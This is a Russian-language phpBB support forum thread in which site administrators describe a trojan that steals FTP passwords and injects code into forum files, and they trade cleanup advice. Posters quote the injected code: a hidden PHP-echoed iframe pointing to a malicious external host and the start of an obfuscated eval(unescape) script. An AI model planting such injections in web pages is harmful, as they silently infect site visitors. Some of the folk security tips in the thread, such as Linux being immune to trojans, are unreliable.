Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 17 лет 8 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
izstas
phpBB 1.4.4
Сообщения: 112
Стаж: 17 лет 2 месяца
Откуда: Елец

Re: Форум лег, появились "кракозяблики"

Сообщение izstas »

Попробуйте отключить gzip
Аватара пользователя
Палыч
Former team member
Сообщения: 9683
Стаж: 17 лет 11 месяцев
Откуда: Питер
Благодарил (а): 1 раз
Поблагодарили: 27 раз

Re: Форум лег, появились "кракозяблики"

Сообщение Палыч »

Prosvetlenie
Рекомендую провериться на наличие в коде файлов "левых" включений кода.
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
модем
phpBB 1.0.0
Сообщения: 5
Стаж: 16 лет 3 месяца

Re: Форум лег, появились "кракозяблики"

Сообщение модем »

У меня была такая дрянь. Вирус. В конце почти каждого файла была строка типа <?php echo iframe......?>. Вылечил восстановлением из резервной копии.
Аватара пользователя
Prosvetlenie
phpBB 1.0.0
Сообщения: 4
Стаж: 16 лет 5 месяцев
Откуда: Украина, Киев

Re: Форум лег, появились "кракозяблики"

Сообщение Prosvetlenie »

Спасибо всем ) буду лечить
Вчера - это история. Завтра - тайна. Настоящее - это дар. Жизнь есть волшебство, и вкус каждого момента неповторим

Психологическое консультирование и тренинги (Киев) - http://www.metapsy.org.ua/
Аватара пользователя
Prosvetlenie
phpBB 1.0.0
Сообщения: 4
Стаж: 16 лет 5 месяцев
Откуда: Украина, Киев

Re: Форум лег, появились "кракозяблики"

Сообщение Prosvetlenie »

Дело решил так: в корневой папке форума во всех пхп файлах в конце кода добавился код вируса... начинался он так:

Код: Выделить всё

<!-- [ 75e2d43649934e330eb179ccbf91445a ] --><script>eval(unescape('function%20gGYuu%28hAI%29%7Bfunction%20oJHWp%28hEIh%29%7Bvar%20tXXEPU%3D0%3Bvar%20hReZ%3
и так далее.... довольно большой кусок... Удалил, и все работает :) Всем кто помогал - спасибо!
Вчера - это история. Завтра - тайна. Настоящее - это дар. Жизнь есть волшебство, и вкус каждого момента неповторим

Психологическое консультирование и тренинги (Киев) - http://www.metapsy.org.ua/
Аватара пользователя
DK7
Former team member
Сообщения: 1008
Стаж: 17 лет 10 месяцев
Откуда: Кишинёв
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение DK7 »

Prosvetlenie
обязательно поменяйте пароли к фтп. иначе через недельку вирус сново постучится).
И не держите пароли в фтп клиенте.
DJ Sample
phpBB 1.4.4
Сообщения: 156
Стаж: 19 лет 11 месяцев

Re: Как убить Трояна?

Сообщение DJ Sample »

Та же самая фигня :(
В конце файлов index.php и index.htm добавляется код
<?php echo '<div style="visibility:hidden"><iframe src="http://gfdsgf333.com/in.cgi?27" width=100 height=80></iframe></div>'; ?>
Посмотрел в панели управления в логах авторизации - там по фтп куча авторизаций с разны ип, точно не моих.
Код вычищаю, пароль на фтп не менял, сегодня сменю.
Но может кто-нибудь в курсе, что за вирус таким занимается, и где он, на моём компе сидит?
Стоит антивирь norton antivirus, что-то ничего не находит.. :(
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 18 лет 9 месяцев
Откуда: Новосибирск
Поблагодарили: 3 раза

Re: Как убить Трояна?

Сообщение Alek$ »

DJ Sample
поставьте еще какой-нибудь антивирус, обязательно смените ВСЕ пароли и проверьте сайт на наличие левых файлов.
А троянов, которые крадут пароли, существует сотни.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Аватара пользователя
Mic70
phpBB 2.0.1
Сообщения: 286
Стаж: 16 лет 10 месяцев
Благодарил (а): 32 раза
Поблагодарили: 11 раз

Re: Как убить Трояна?

Сообщение Mic70 »

Блин, ну что за люди! Я же писал : поставьте CHMOD444 на все файлы index и ВСЁ!!! У меня с тех пор НИ РАЗУ не было этих троянов! З.Ы. Я, в отличии от Касперского, денег не беру! :D
Phpbb 3.3.11
Аватара пользователя
DK7
Former team member
Сообщения: 1008
Стаж: 17 лет 10 месяцев
Откуда: Кишинёв
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение DK7 »

я так работаю .. вирус ворует пароли от фтп. Через коммандеры. В коммандере когда пишем пароль , указываем в нем на один лишний символ больше, к примеру в конце пароля.. Пароль запоминается и воруется трояном. Но он не верный.
При последующем соединении, соответственно пишет что неверный пароль, жмем на заново ввести пароль и просто трем последний символ , стираем бэкспейсом. Все тут же коннектится.
Вирус в таком случае бессильный. Не надо менять атрибуты доступа к файлам, отпадают ухищрения и т.д.
Все довольно просто. ИМХО.
Пока за месяцев 10 ни разу проблем не возникло...

Добавлено спустя 2 минуты 7 секунд:
Добавлю, перед этим нужно вычистить все файлы от вредоносного кода. А потом вполне то.
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 18 лет 9 месяцев
Откуда: Новосибирск
Поблагодарили: 3 раза

Re: Как убить Трояна?

Сообщение Alek$ »

Давайте еще и я выпендрюсь. У меня стоит Linux, под него трояны не пишут и я могу хранить пароли где угодно. Но это еще не все. Файл с паролями у меня шифруется алгоритмом GPG, 1024-битным ключом. Ни разу за всю жизнь никто не спер у меня пароля.

А если серьезно, то просто не храните пароли в стандартным хранилищах. Трояны тупые и даже незашифрованный файлик где-нибудь в моих документах не найдут, если вы, конечно, не назовете его passwords.txt. А еще лучше просто помнить самые важные пароли и не записывать нигде.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Аватара пользователя
FladeX
Former team member
Сообщения: 1935
Стаж: 16 лет 11 месяцев
Откуда: Саранск
Поблагодарили: 4 раза

Re: Как убить Трояна?

Сообщение FladeX »

Alek$, зачет 8-)
У меня тож линукс, до сих пор ни одного инцидента не было :geek:
//
// Okay, let's do the loop, yeah come on baby let's do the loop
// and it goes like this ...
| phpBB Adept ] | Каталог форумов | генератор sitemap для форумов | форум про форумы
stealth0000
phpBB 1.0.0
Сообщения: 4
Стаж: 15 лет 8 месяцев

Re: Как убить Трояна?

Сообщение stealth0000 »

Вредоносный фрейм:

Код: Выделить всё

<iframe src="http://liteto***catesite.cn/in.cgi?cocacola2" width=1 height=1 style="visibility: hidden"></iframe>
Будет добавлен в сегодняшнее обновление каспера.
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 18 лет 9 месяцев
Откуда: Новосибирск
Поблагодарили: 3 раза

Re: Как убить Трояна?

Сообщение Alek$ »

От греха подальше "побил" ссылку.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Аватара пользователя
FladeX
Former team member
Сообщения: 1935
Стаж: 16 лет 11 месяцев
Откуда: Саранск
Поблагодарили: 4 раза

Re: Как убить Трояна?

Сообщение FladeX »

DK7 писал(а):В коммандере когда пишем пароль , указываем в нем на один лишний символ больше, к примеру в конце пароля..
Кстати хакеры сейчас прочитают и кончится халява :lol:
//
// Okay, let's do the loop, yeah come on baby let's do the loop
// and it goes like this ...
| phpBB Adept ] | Каталог форумов | генератор sitemap для форумов | форум про форумы

Вернуться в «phpBB-пространство»